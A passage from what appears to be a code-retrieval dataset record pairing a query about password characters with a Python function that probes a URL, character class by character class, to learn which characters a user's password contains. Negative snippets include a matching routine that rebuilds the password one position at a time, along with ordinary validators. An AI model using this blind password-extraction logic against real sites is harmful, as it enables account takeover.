self.assertTrue(all_unique_chars(\"thorn\"))\n self.assertTrue(all_unique_chars(\"malibu\"))\n self.assertTrue(all_unique_chars(string.ascii_letters))", "def __init__(self):\n self.file_name = 'assets/a.jpg'\n self.digit_to_word = {y: x for x, y in zip(list(string.ascii_uppercase), range(26))}\n self.digit_to_word[-1] = '?'", "def test_analyze_syntax_utf8():\n test_string = \"a \\u00e3 \\u0201 \\U0001f636 b\"\n byte_array = test_string.encode(\"utf8\")\n result = analyze.analyze_syntax(test_string, encoding=\"UTF8\")\n tokens = result[\"tokens\"]\n\n assert tokens[0][\"text\"][\"content\"] == \"a\"\n offset = tokens[0][\"text\"].get(\"beginOffset\", 0)\n assert (\n byte_array[offset : offset + 1].decode(\"utf8\") == tokens[0][\"text\"][\"content\"]\n )\n\n assert tokens[1][\"text\"][\"content\"] == \"\\u00e3\"\n offset = tokens[1][\"text\"].get(\"beginOffset\", 0)\n assert (\n byte_array[offset : offset + 2].decode(\"utf8\") == tokens[1][\"text\"][\"content\"]\n )\n\n assert tokens[2][\"text\"][\"content\"] == \"\\u0201\"\n offset = tokens[2][\"text\"].get(\"beginOffset\", 0)\n assert (\n byte_array[offset : offset + 2].decode(\"utf8\") == tokens[2][\"text\"][\"content\"]\n )\n\n assert tokens[3][\"text\"][\"content\"] == \"\\U0001f636\"\n offset = tokens[3][\"text\"].get(\"beginOffset\", 0)\n assert (\n byte_array[offset : offset + 4].decode(\"utf8\") == tokens[3][\"text\"][\"content\"]\n )\n\n # This demonstrates that the offset takes into account the variable-length\n # characters before the target token.\n assert tokens[4][\"text\"][\"content\"] == \"b\"\n offset = tokens[4][\"text\"].get(\"beginOffset\", 0)\n # 'b' is only one byte long\n assert (\n byte_array[offset : offset + 1].decode(\"utf8\") == tokens[4][\"text\"][\"content\"]\n )", "def __setVarNames(self):\n result = set()\n\n # detecting variables\n for templatePart in self.inputString().split(\"{\"):\n if templatePart is '' or \"}\" not in templatePart:\n continue\n\n endIndex = templatePart.find('}')\n result.add(templatePart[:endIndex])\n\n self.__varNames = list(result)", "def char_to_seq( self, uchar ):\n\t\t\n\t\tlstParts = self._char39[ uchar ].split( '+' ) # [ 'nb', 'ns', 'nb', ... ]\n\t\t# Force evaluation with globals definition and local object definition (say on self.x)\n\t\treturn [ eval( '_'+code, globals(), self.__dict__ ) for code in lstParts ]", "def make_control_character():\n # Add one character made up of one codepoint each from\n # (High Surrogates + High Private Use Surrogates) and Low Surrogates.\n # We expect each such pair to behave as a single high-codepoint\n # character.\n controls = ('0000', '001F')\n return [unicode_char(char)\n for char in range(int(controls[0], 16), int(controls[1], 16)+1)]", "def get_charset(self, default: str) -> str:\n ..." ]
[ "0.58729345", "0.5847239", "0.58128977", "0.56627953", "0.5647866", "0.56441444", "0.56391495", "0.5624327", "0.55717635", "0.55333704", "0.5514946", "0.5514946", "0.5495993", "0.5446798", "0.544425", "0.5440407", "0.54331005", "0.54176193", "0.5314018", "0.5313979", "0.5313128", "0.5309224", "0.5298356", "0.527755", "0.52611935", "0.52510184", "0.52496505", "0.5229648", "0.5205429", "0.51906306", "0.5186572", "0.51775104", "0.5175352", "0.5168285", "0.5165016", "0.5161325", "0.513823", "0.5129395", "0.5120737", "0.5090299", "0.50884044", "0.5086532", "0.508054", "0.5073912", "0.50552005", "0.5049577", "0.50485075", "0.5044567", "0.50406665", "0.5039525", "0.50372297", "0.50262475", "0.5022382", "0.5013801", "0.49921584", "0.4981898", "0.4968761", "0.49659765", "0.49619576", "0.49501508", "0.4942157", "0.49290454", "0.49225268", "0.49098757", "0.49058565", "0.48963648", "0.48909965", "0.48828423", "0.48796335", "0.48734087", "0.48726767", "0.48714727", "0.48702624", "0.4860891", "0.48569196", "0.48562714", "0.485253", "0.4844364", "0.48440045", "0.48353714", "0.48350587", "0.48342454", "0.48306805", "0.4829435", "0.4827993", "0.48257175", "0.48242673", "0.48241824", "0.48232907", "0.48168135", "0.48143786", "0.4810746", "0.48079836", "0.4801823", "0.47995263", "0.4796911", "0.47926712", "0.4791584", "0.47910103", "0.47903904" ]
0.53112906
21
checks for common characters in the password and returns the characters contained somewhere in the password string
def makeList(username, url, caseSensitive = False, wildCards = True): charList = [] for ch in lower: # check for ch in if(checkPasswordCharacter(str(ch), username, url)): charList.append(str(ch)) print(ch) for ch in numbers: if(checkPasswordCharacter(str(ch), username, url)): charList.append(str(ch)) print(ch) for ch in special: if(checkPasswordCharacter(str(ch), username, url)): charList.append(str(ch)) print(ch) for ch in other: if(checkPasswordCharacter(str(ch), username, url)): charList.append(str(ch)) print(ch) if(caseSensitive): for ch in upper: if(checkPasswordCharacter(str(ch), username, url)): charList.append(str(ch)) print(ch) if(wildCards): for ch in wildcards: if(checkPasswordCharacter(str(ch), username, url)): charList.append(str(ch)) print(ch) return charList
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def analyze_password(password):\n vowels = number_of_vowels(password)\n if valid_password(password) is True:\n result = password + \" is a valid password and contains \" + str(vowels) + \" vowels.\"\n else:\n result = password + \" is not a valid password and contains \" + str(vowels) + \" vowels.\"\n return result", "def generate_password():\n selection = string.ascii_letters + string.digits\n\n while True:\n password = \"\".join(secrets.choice(selection) for i in range(16))\n\n if (\n any(c.isupper() for c in password)\n and any(c.islower() for c in password)\n and any(c.isdigit() for c in password)\n ):\n break\n\n return password", "def is_valid_password_v2(password):\n\n low = password[\"letter\"] == password[\"password\"][password[\"low\"] - 1]\n high = password[\"letter\"] == password[\"password\"][password[\"high\"] - 1]\n\n return xor(low, high)", "def is_complex(password):\n if len(password) >= 12:\n if any(c.isupper() for c in password):\n if any(c.islower() for c in password):\n if any(c.isdigit() for c in password):\n if any(c in punctuation for c in password):\n return True\n return False", "def valid_password(password):\n val = True\n\n if len(password) < 8:\n val = False\n return val\n\n if not any(char.isdigit() for char in password):\n val = False\n return val\n\n if not any(char.isupper() for char in password):\n val = False\n return val\n\n if not any(char.islower() for char in password):\n val = False\n return val\n\n if val:\n return val", "def solve_part_two(self):\n password = list(\"XXXXXXXX\")\n index = 0\n counter = 0\n while counter < 8:\n (s, found_index) = self.find_next_hash(index)\n index = found_index + 1\n offset = ord(s[5]) - ord(\"0\")\n # Offset invalid or password character already set previously?\n if offset >= 8 or password[offset] != \"X\":\n continue\n password[offset] = s[6]\n counter += 1\n return \"\".join(password)", "def check_pass(password):\n # big_chain : length of longest chain of repeated symbols\n # c_start : index at which big_chain starts\n big_chain = 0\n cur_loc = 0\n for symb in password:\n if big_chain == 0:\n l_symb = symb\n cur_chain = 1\n big_chain = 1\n c_start = 0\n cur_c = cur_loc\n cur_loc += 1\n continue\n if symb == l_symb:\n cur_chain += 1\n else:\n cur_chain = 1\n cur_c = cur_loc\n if cur_chain > big_chain:\n big_chain = cur_chain\n c_start = cur_c\n cur_loc += 1\n l_symb = symb\n\n # return or repeat, need big_chain, c_start\n if big_chain < 2:\n return False\n if big_chain == 2:\n return True\n return (check_pass(password[:c_start])\n or check_pass(password[c_start+big_chain:]))", "def validate_password(password):\n return isinstance(password, str) and len(password) >= 8 and \\\n re.search(r'[A-Z]', password) and re.search(r'[0-9]', password)", "def password(self) -> str:", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def _validatePassword(password):\n\n uppercaseChars = re.search('[A-Z]', password)\n lowercaseChars = re.search('[a-z]', password)\n\n if len(password) < 8:\n raise Exception(\"Password must be at lest 8 letters\")\n elif re.search('[0-9]', password) is None:\n raise Exception(\"Password must contain atleast one number\")\n elif uppercaseChars is None or lowercaseChars is None:\n raise Exception(\"Password must contain upper and lowercase letters\")\n else:\n return password", "def if_unique_chars_two(s):\n\tpass", "def invalid_password(password):\n special_characters = ['$', '#', '@']\n password = password.replace(\" \", \"\")\n test_conditions = [\n (len(password) >= 8 and len(password) <= 12),\n (any(x.isupper() for x in password) and any(x.islower()\n for x in password)),\n (any(y in password for y in special_characters)\n and any(y.isdigit() for y in password))\n ]\n if all(condition is True for condition in test_conditions):\n return False\n return True", "def _password_validate(s):\n if len(s) < 6:\n raise ValueError('Passwords must be at least 6 characters long')\n allowed_characters = frozenset(string.ascii_letters + string.digits +\n string.punctuation)\n if frozenset(s).issuperset(allowed_characters):\n raise ValueError('Invalid character in password: '\n 'use letters, numbers and punctuation')\n\n return", "def valid_password(lower, upper, letter, password):\n # Note the -1 to turn 1 indexing into 0 indexing\n matches = [idx for idx in (lower, upper) if password[idx - 1] == letter]\n return len(matches) == 1", "def checkPass(username, url, charList, n):\n # dikt = {}\n password = \"\"\n for i in range(0, n):\n if(testPassword(password, username, url)):\n return password #password is found! \n # https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python\n ch = findChar(username, url, charList, i)\n # if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string \n # use try except instead of if(isinstance(ch, int)):\n # https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not\n try: \n password += ch\n except TypeError:\n # print(i)\n password += str(ch) #should be blank\n # raise ValueError(\"index i has no matching character\")\n return password #only reached if password is too long for the given n", "def is_valid_password(variable):\n if re.match(r'[A-Za-z0-9@#$%^&+=]{8,}', variable):\n return True\n return False", "def test05_password_special(self):\n self.set_complexity(length=0, numeric=0, upper=0, lower=0, special=5)\n\n invalid = (\n \"A\",\n \"!!!!\",\n \"!A_B@C£D\",\n \"@@PASSWORD123!!\",\n \"ADMIN\",\n \"A1aB2bC3cD4dE5eF6fG7g\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"_____\",\n \"_!@£$\",\n \"A!B@C£D$F%\",\n \"Tr0ub4dor&3!@£$\",\n \"1234;.,/]1234\",\n \"a!A@0£b$B%0^c&C*0(d)D_0+e\",\n 'password1234\\'\"\"\"\"\"',\n \"p@$$w@*d\",\n )\n self.set_passwords(valid)", "def solve_part_one(self):\n password = \"\"\n index = 0\n while len(password) < 8:\n (s, found_index) = self.find_next_hash(index)\n password += s[5]\n index = found_index + 1\n return password", "def password():\n chars = \"abcdefghijklmnopqsrtuvwxyzABCDEFGHIJKLMNOPQSRTUVWXYZ\"\\\n \"123456890!#%&-_*<>+=()\"\n return ''.join(random.sample(chars, 15))", "def check_pwd_policy2(processed):\n policy, letter, pwd = processed\n idx1 = policy[0] - 1\n idx2 = policy[-1] - 1\n return (pwd[idx1] == letter) ^ (pwd[idx2] == letter)", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def check_pwd_policy1(processed):\n policy, letter, pwd = processed\n return pwd.count(letter) in policy", "def bytes_to_chars(passwd):\n return passwd[1::2]", "def valid_password(password):\n password_regex = re.compile(r\"^.{8,20}$\")\n return password and password_regex.match(password)", "def get_password():\n\n pwd = getpass(\"Enter your password below. It is used to protect your credentials.\\n\"\n \"The password must have a minimum length of 8 characters \"\n \"and can only contain alphanumeric characters and symbols.\\n\"\n \"Enter password (will be hidden): \")\n\n tries = 0 # Limit number of invalid attempts\n while True:\n if len(pwd) >= 8 and pwd.isascii() and pwd.isprintable() and ' ' not in pwd:\n if getpass(\"Confirm password: \") == pwd:\n return pwd\n else:\n print(\"Password mismatch!\")\n else:\n print(\"Invalid characters in password or too short!\")\n\n if tries == 3: return None\n pwd = getpass(\"\\nRe-enter password: \")\n tries += 1", "def anypassword():\n\n characters = string.ascii_uppercase + string.ascii_lowercase + string.digits\n size = random.randint(8, 12)\n password = ''.join(random.choice(characters) for x in range(size))\n\n return password", "def password (string):\n\t\n\treturn hexdigest_mySQL41plus (string)", "def is_valid_password(password):\n assert password is not None\n password = str(password)\n return len(password) >= 8 and any(s.islower() for s in password) \\\n and any(s.isupper() for s in password) \\\n and any(s.isdigit() for s in password)", "def password_validates(password):\n if any(char.isdigit() for char in password) \\\n and any(char.isalpha() for char in password) \\\n and len(password) > 5:\n return True\n else:\n return False", "def findChar(username, url, charList, i):\n for ch in charList:\n if(checkPasswordCharacter(ch, username, url, index = i)):\n return ch\n #only runs if no ch in charList match:\n # return i #oof, there's no match if i is out of bounds, e.g. len(password) < i\n print(\"Missing: \" + i) #so I know when it's not a match\n return \"\" #return an empty string instead\n # Note to self: should not return an _ because it'll match an _ if wildCards are true (default). \n # If wildCards is false, this will just skip characters that don't match anything!", "def password_is_valid_2(password, character, num_1, num_2):\n char_1 = password[num_1 - 1] # position is 1-based, not 0-based as would be Python default\n char_2 = password[num_2 - 1]\n\n return (char_1 == character or char_2 == character) and char_1 != char_2", "def find_password( door_id ):\n\n\tpassword = [ '', '', '', '', '', '', '', '' ]\n\tincrementor = 0\n\t\n\tfor _i in range( 8 ):\n\t\tchar = ''\n\t\twhile not char:\n\t\t\t#_do_stupid_movie_password_animation( password, _i )\n\n\t\t\tinput = door_id + str( incrementor )\n\t\t\tm = hashlib.md5( )\n\t\t\tm.update( input.encode( 'utf-8' ) )\n\t\t\thash = m.hexdigest( )\n\n\t\t\tif hash.startswith( '00000' ):\n\t\t\t\tloc = hash[ 5 ]\n\t\t\t\tchar = hash[ 6 ]\n\t\t\t\tif loc.isdigit( ):\n\t\t\t\t\tloc = int( loc )\n\t\t\t\t\tif 0 <= loc <= ( len( password ) - 1 ) and not password[ loc ]:\n\t\t\t\t\t\tpassword[ loc ] = char\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tchar = ''\n\t\t\t\telse:\n\t\t\t\t\tchar = ''\n\t\t\t\n\t\t\tincrementor += 1\n\n\tpassword = ''.join( password )\n\treturn password", "def clean_password(self):\n password = self.cleaned_data['password']\n\n if CHECK_STRENGTH:\n if len(password) < MIN_PASSWORD_LEN:\n raise forms.ValidationError('Password must have at least %i characters.' % MIN_PASSWORD_LEN)\n\n symbols = set(password)\n\n if not ((_digit & symbols and _upper & symbols) or \\\n (_digit & symbols and _lower & symbols) or \\\n (_lower & symbols and _upper & symbols)):\n raise forms.ValidationError('Password is too week. Invent better one.')\n\n return password", "def test06_password_mixture(self):\n self.set_complexity(length=14, numeric=1, upper=1, lower=1, special=1)\n\n invalid = (\n \"A\",\n \"ACBDEabcde!!!!\",\n \"Tr0ub4dor&3\",\n \"!A_B@C£D\",\n \"@@PASSWORD123!!\",\n \"ADMIN\",\n \"A1aB2bC3cD4dE5eF6fG7g\",\n \"1234;.,/]1234\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"Sixteenchars12@_\",\n \"thisis4reallybadPassword!\",\n \"C0rrecthorsebatteryst@ple\",\n \"a!A@0£b$B%0^c&C*0(d)D_0+e\",\n 'Password1234\\'\"\"\"\"\"',\n )\n self.set_passwords(valid)", "def check_password(raw_password, enc_password):\n algo, salt, hsh = enc_password.split('$')\n return constant_time_compare(hsh, get_hexdigest(algo, salt, raw_password))", "def clean_password(self):\n if 'password' in self.cleaned_data:\n PWD_MIN_CHAR = 8\n PWD_MAX_CHAR = 45\n\n pattern = \"(?=^.{%i,%i}$)((?=.*\\\\d)(?=.*[A-Z])(?=.*[a-z])(?=.*[^A-Za-z0-9]))^.*\" % (PWD_MIN_CHAR, PWD_MAX_CHAR)\n\n if re.match(pattern, self.cleaned_data['password']) is None:\n raise forms.ValidationError('Valid password should contain at least %i alphanumeric characters. Contain both upper and lower case letters. Contain at least one number (for example, 0-9). Contain at least one special character (for example,!@#$%%^&*()+=-[]\\\\\\';,./{}|\\\":?~_<>)' % PWD_MIN_CHAR)\n\n return self.cleaned_data['password']", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def verify_password(password):\n password_reg_exp = re.compile(r\"^.{3,20}$\")\n return password and password_reg_exp.match(password)", "def passwd_prompt():\n\n print(\"Passwords MUST contain AT LEAST: one lower-case letter,\" \n \"one number, one symbol, and be a MINIMUM of 8 characters in length,\"\n \"e.g. r!ght2oE\")\n\n while True:\n\n passy = getpass.getpass(prompt=\"Enter password for user: \")\n confirm_passy = getpass.getpass(prompt=\"To confirm, \" \\\n \"re-enter password: \")\n\n # check for the following conditions: \n # user input matches\n # length of input is at least 8 characters\n # input contains at least 1 number \n # input contains at least 1 letter \n # input contains at least 1 symbol \n \n if passy != confirm_passy \\\n or len(passy) <8 \\\n or not re.search('\\d', passy) \\\n or not re.search(r\"[a-z]\",passy) \\\n or not re.search(r\"[ !#$%&'()*+,-./[\\\\\\]^_`{|}~\"+r'\"]', passy): \n \n print(TRY_AGAIN)\n continue \n \n else:\n print(\"Password meets complexity requirement. Continuing...\") \n return passy", "def get_user_password(text):\n return getpass.getpass(text)", "def has_right_symbols(string):\n for letter in string:\n if letter in \"$#@\":\n return True\n # End of the loop, we still didn't see any numbers, else we \n # woud have exited the function\n print(\"Your password needs to contain one of those symbols: $#@\")\n return False", "def test_generate_secret(self):\n random_secret = ef_password.generate_secret(24)\n self.assertEqual(len(random_secret), 24)\n assert not set('[~!@#$%^&*()_+{}\":;\\']+$').intersection(random_secret)", "def test_check_password():\n assert check_password('Longpassword') == False\n assert check_password('123456') == False\n assert check_password('short') == False\n assert check_password('C0rect') == False\n assert check_password('Correct8') == True", "def pass_check(user_found):\n password = ''\n while password != user_found[1]:\n password = stdiomask.getpass(prompt=\"Please enter your password: \", mask='*')\n pass1 = encrypter.encrypt_password(password)\n if user_found[1] == pass1:\n return \"\\nPassword match\\n\"\n else:\n print(\"\\nPassword do not match\\n\")", "def brute_force_attack(string):\n try:\n for key in range(1, 26):\n string_to_return = \"\"\n for l in string:\n if not(l >= 'A'and l <= 'Z' or l >= 'a'and l <= 'z'):\n string_to_return += l\n elif key + ord(l.upper()) > ord('Z'):\n string_to_return += chr(ord('A') + ord('Z') - ord(l.upper()))\n else:\n string_to_return += chr(ord(l.upper())+key)\n print(string_to_return)\n return string_to_return\n except Exception as ex:\n print(EXCEPTION_MESSAGE, ex)", "def password_is_valid_1(password, character, num_1, num_2):\n # count how often does each character occurs\n counter = Counter(password)\n character_count = counter[character] # defaults to zero if character doesn't exist at all\n return num_1 <= character_count <= num_2", "def verify_password(entered_password):\n return PASSWORD_RE.match(entered_password)", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def search_bad_chars() -> str:\n\n lines = get_input()\n bad_chars = \"\\\\\"+hex(0) # x00 is always a badchar\n \n for i in range(1,255,8):\n for i in range(i,i+7):\n lines[i] = int(lines[i],16)\n if(hex(i) != hex(lines[i])):\n bad_chars += \"\\\\\"+hex(i)\n \n print(\"Found these bad characters:\",bad_chars)\n\n return bad_chars", "def get_password(wordlen, digitlen, words, strength):\n\n while True:\n\n try:\n w = words.pop().capitalize()\n except IndexError:\n sys.exit(\"Unable to get a sufficiently strong password\")\n\n s = np.random.choice(SPECIAL_CHARS)\n i = np.random.randint(0, 10**digitlen)\n\n comp = [w, f\"{i:0{digitlen}d}\", s, s]\n np.random.shuffle(comp)\n pw = ''.join(comp)\n\n # pw = str(f\"{s}{w}{i:0{digitlen}d}{s}\")\n stats_pw = PasswordStats(pw)\n\n if stats_pw.strength() >= strength:\n return pw, stats_pw", "def is_strong(password):\n # at least eight characters long\n if len(password) < 8:\n return False\n\n # contains both uppercase and lowercase characters\n upper = re.compile(r\"[A-Z]\")\n up = upper.search(password)\n lower = re.compile(r\"[a-z]\")\n low = lower.search(password)\n\n # has at least one digit\n digit = re.compile(r'[0-9]')\n dig = digit.search(password)\n\n if up is None or low is None or dig is None:\n return False\n\n return True", "def password_validator(username, password):\n digits = re.search(r'\\d+', password)\n capital_letters = re.search(r'[A-Z]+', password)\n lenght = len(password) > PASSWORD_MIN_LENGTH\n special_symbol = re.search(r'[\\-\\/\\@\\?\\!\\,\\.\\#\\&\\*]+', password)\n\n statement = digits and capital_letters and lenght and special_symbol\n\n if statement:\n return True\n return False", "def get_password(args):\n for password in args:\n heashed=hash_password(password)\n print(heashed)\n # checked=check_password(heashed)", "def validate_password(password):\n if re.match(r\"^[a-zA-Z0-9]{10,30}$\", password):\n return True\n return False", "def non_secret_char(c):\n return c", "def password_validator(password: str) -> bool:\n uppercase_regex = re.compile(r\"[A-Z]+\")\n lowercase_regex = re.compile(r\"[a-z]+\")\n digit_regex = re.compile(r\"\\d+\")\n\n if len(password) < 8:\n return False\n if not uppercase_regex.findall(password):\n return False\n if not lowercase_regex.findall(password):\n return False\n if not digit_regex.findall(password):\n return False\n else:\n return True", "def clean_password1(self):\n if 'password1' in self.cleaned_data and self.cleaned_data['password1']:\n PWD_MIN_CHAR = 8\n PWD_MAX_CHAR = 45\n\n pattern = \"(?=^.{%i,%i}$)((?=.*\\\\d)(?=.*[A-Z])(?=.*[a-z])(?=.*[^A-Za-z0-9]))^.*\" % (PWD_MIN_CHAR, PWD_MAX_CHAR)\n\n if re.match(pattern, self.cleaned_data['password1']) is None:\n raise forms.ValidationError('Valid password should contain at least %i alphanumeric characters. Contain both upper and lower case letters. Contain at least one number (for example, 0-9). Contain at least one special character (for example,!@#$%%^&*()+=-[]\\\\\\';,./{}|\\\":?~_<>)' % PWD_MIN_CHAR)\n\n return self.cleaned_data['password1']", "def check_password(raw_password, enc_password):\n algo, salt, hsh = enc_password.split('$')\n return hsh == get_hexdigest(algo, salt, raw_password)", "def check_password(raw_password, enc_password):\n algo, salt, hsh = enc_password.split('$')\n return hsh == get_hexdigest(algo, salt, raw_password)", "def is_valid_password(self, password):\n rex = \"^[a-zA-Z0-9@_+-.]{3,}$\"\n return re.match(rex, password)", "def other_chars(self):\n return re.findall(r'[,.!?_\\':;/#%*\\=@\"]', self.text)", "def is_palindrome_ingoring_case_and_non_letter_chars(text):", "def find_valid_passwords(values: List[str]) -> int:\n search_reg = re.compile(\n r\"\\b(?P<first>[0-9]+)-(?P<second>[0-9]+)\\s(?P<letter>[a-z]):\\s(?P<password>[a-z]+)\")\n valid_password_count = 0\n\n for value in values:\n results = search_reg.search(value)\n target_char = results.group(\"letter\")\n password = results.group(\"password\")\n first_index = int(results.group(\"first\")) - 1\n second_index = int(results.group(\"second\")) - 1\n\n if (target_char == password[first_index]) != (target_char == password[second_index]):\n valid_password_count += 1\n\n return valid_password_count", "def pw_is_viable(password: str) -> bool:\n logging.debug(\"called\")\n if not any([\n not password,\n len(password) < 8,\n not any(map(lambda x: x.isdigit(), password)),\n not any(map(lambda x: x.isupper(), password)),\n not any(map(lambda x: x.islower(), password)),\n not any(map(lambda x: x in SPECIAL_CHARACTERS, password)),\n ]):\n return True\n else:\n raise PasswordError(\"Password should contain at least a digit, an uppercase, a lower case, and special \"\n \"characters and should be at least 8 digits in total.\", password)", "def valida_digito(password):\n for s in password:\n if s.isdigit() == True: \n return True\n return False", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def test_multiple_char_not_unique(self):\n self.assertFalse(all_unique_chars(\"aa\"))\n self.assertFalse(all_unique_chars(\"alabama\"))\n self.assertFalse(all_unique_chars(\"Ricardio\"))\n self.assertFalse(all_unique_chars(\"aardvark\"))\n self.assertFalse(all_unique_chars(\"Zimbabwe\"))\n self.assertFalse(all_unique_chars(\"....What?....\"))", "def contains_only_double_digit(password: int) -> bool:\n word = str(password)\n\n if word[0] == word[1] and word[0] != word[2]:\n return True\n if word[-2] == word[-1] and word[-2] != word[-3]:\n return True\n\n for i in range(1, len(word)-2):\n if word[i] == word[i+1] and word[i] != word[i+2] and word[i] != word[i-1]:\n return True\n\n return False", "def _hashPassword(password):\n charset = './' + ascii_letters + digits\n return crypt.crypt(password, ''.join(random.sample(charset, 2)))", "def is_allowed_password(password):\n if not is_filled_password(password):\n return \"Password is a required field.\"\n elif not is_regex_password(password):\n return \"That is not a valid password.\"\n else:\n return \"\"", "def solve():\n cipher_bytes = get_cipher_bytes()\n best_so_far = 0\n message = None\n for password in get_passwords_iterator():\n possible_message = decrypt_cipher(cipher_bytes, password)\n if possible_message:\n num_spaces = len(filter(lambda x: x == ' ', possible_message))\n if num_spaces >= best_so_far:\n best_so_far = num_spaces\n message = possible_message\n print ''.join(message)\n answer = sum([ord(c) for c in message])\n return answer", "def password_validation(pass1,pass2):\n errors = []\n if(pass1 != pass2):\n errors.append(\"Lösenorden matchade inte.\")\n if(len(pass1) < 3):\n errors.append(\"Lösenordet måste vara längre än 3 bokstöver.\")\n \n return errors", "def validate_password(self, value: str) -> str:\n return make_password(value)", "def is_unique_chars_map(string):\n\n if len(string) > 128:\n return False\n\n chars_list = [False] * 128\n for char in string:\n if chars_list[ord(char)]:\n return False\n chars_list[ord(char)] = True\n return True", "def SecondPart():\n return passwordChecker(data)", "def test_long(self):\n s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 